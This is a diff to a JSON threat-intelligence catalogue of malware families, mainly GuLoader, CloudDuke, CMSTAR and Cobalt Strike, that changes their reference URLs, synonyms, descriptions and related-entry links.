+ "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195",
+ "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two",
+ "https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/",
+ "https://twitter.com/VK_Intel/status/1255537954304524288",
+ "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/",
+ "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/",
+ "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/",
+ "https://www.crowdstrike.com/blog/guloader-malware-analysis/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/",
+ "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html",
+ "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4",
+ "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/",
+ "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/",
+ "https://twitter.com/VK_Intel/status/1252678206852907011",
+ "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
+ "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans",
+ "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader",
+ "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
+ "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/",
+ "https://twitter.com/VK_Intel/status/1257206565146370050",
+ "https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa",
+ "https://malwation.com/malware-config-extraction-diaries-1-guloader/",
+ "https://labs.k7computing.com/?p=21725Lokesh",
+ "https://labs.vipre.com/unloading-the-guloader/"
],
"synonyms": [
"GuLoader",
@@ -16936,17 +18030,20 @@
"value": "CloudEyE"
},
{
- "description": "",
+ "description": "F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke",
"https://www.f-secure.com/weblog/archives/00002822.html"
],
- "synonyms": [],
+ "synonyms": [
+ "CloudLook",
+ "MiniDionis"
+ ],
"type": []
},
"uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c",
- "value": "Cloud Duke"
+ "value": "CloudDuke"
},
{
"description": "",
@@ -16966,25 +18063,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar",
- "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
"https://twitter.com/ClearskySec/status/963829930776723461",
- "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
+ "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/",
+ "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
],
"synonyms": [
"meciv"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "e81b96a2-22e9-445e-88c7-65b67c2299ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e",
"value": "CMSTAR"
},
@@ -16999,15 +18087,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "92628a72-c874-11e8-a094-ebbb3bd1f412",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217",
"value": "CoalaBot"
},
@@ -17016,8 +18095,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobaltmirage_tunnel",
- "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us",
- "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools"
+ "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools",
+ "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us"
],
"synonyms": [],
"type": []
@@ -17030,611 +18109,649 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike",
- "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
- "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/",
- "https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/",
- "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
- "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/",
- "https://wbglil.gitbook.io/cobalt-strike/",
- "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
- "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734",
- "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought",
- "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
- "https://malwarelab.eu/posts/fin6-cobalt-strike/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://asec.ahnlab.com/en/31811/",
- "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
- "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
- "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html",
- "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/",
- "https://connormcgarr.github.io/thread-hijacking/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
- "https://www.contextis.com/en/blog/dll-search-order-hijacking",
- "https://www.mandiant.com/media/12596/download",
- "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/",
- "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
- "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
- "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
- "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
- "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf",
- "https://redcanary.com/blog/intelligence-insights-december-2021",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
- "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64",
- "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia",
- "https://www.mandiant.com/media/10916/download",
- "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
- "https://twitter.com/elisalem9/status/1398566939656601606",
- "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
- "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
- "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
- "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e",
- "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
- "https://malware-traffic-analysis.net/2021/09/29/index.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-president",
- "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py",
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/",
- "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
- "https://twitter.com/vikas891/status/1385306823662587905",
- "https://redcanary.com/blog/grief-ransomware/",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
- "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
- "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
- "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
- "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811",
- "https://cert.gov.ua/article/703548",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
- "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
- "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py",
- "https://asec.ahnlab.com/en/34549/",
- "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
- "https://security.macnica.co.jp/blog/2022/05/iso.html",
- "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
- "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel",
- "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
- "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/",
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
- "https://twitter.com/GossiTheDog/status/1438500100238577670",
- "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
- "https://blog.group-ib.com/colunmtk_apt41",
- "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
- "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
- "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack",
- "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
- "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/",
- "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
- "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux",
- "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-148a",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/",
- "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
- "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/",
- "https://www.macnica.net/file/mpression_automobile.pdf",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf",
- "https://asec.ahnlab.com/ko/19860/",
- "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
- "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
- "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
- "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
- "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/",
- "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
- "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/",
- "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims",
- "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
- "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://www.cobaltstrike.com/support",
- "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
- "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
- "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
- "https://isc.sans.edu/diary/rss/27618",
- "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
- "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
- "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://twitter.com/alex_lanstein/status/1399829754887524354",
- "https://isc.sans.edu/diary/rss/27176",
- "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass",
- "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://twitter.com/RedDrip7/status/1402640362972147717?s=20",
- "https://securelist.com/apt-luminousmoth/103332/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
- "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/",
- "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
- "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
- "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a",
- "https://www.youtube.com/watch?v=ysN-MqyIN7M",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/",
- "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
- "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
- "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
- "https://isc.sans.edu/diary/rss/26862",
- "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/",
- "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
- "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf",
- "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups",
- "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
- "https://boschko.ca/cobalt-strike-process-injection/",
- "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html",
- "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan",
- "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
- "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware",
- "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7",
- "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
- "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/",
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
- "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis",
- "https://www.telsy.com/download/5972/?uid=d7c082ba55",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/",
- "https://isc.sans.edu/diary/27308",
- "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/",
- "http://blog.nsfocus.net/murenshark",
- "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
- "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
- "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
- "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
- "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.youtube.com/watch?v=FC9ARZIZglI",
- "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
- "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b",
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/",
- "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
- "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf",
- "https://blog.group-ib.com/REvil_RaaS",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://isc.sans.edu/diary/rss/28752",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
- "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/",
- "https://github.com/Apr4h/CobaltStrikeScan",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
- "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
- "https://www.youtube.com/watch?v=WW0_TgWT2gs",
- "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
- "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
- "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/",
- "https://www.brighttalk.com/webcast/7451/462719",
- "https://community.riskiq.com/article/f0320980",
- "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
- "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/",
- "https://401trg.com/burning-umbrella/ ",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
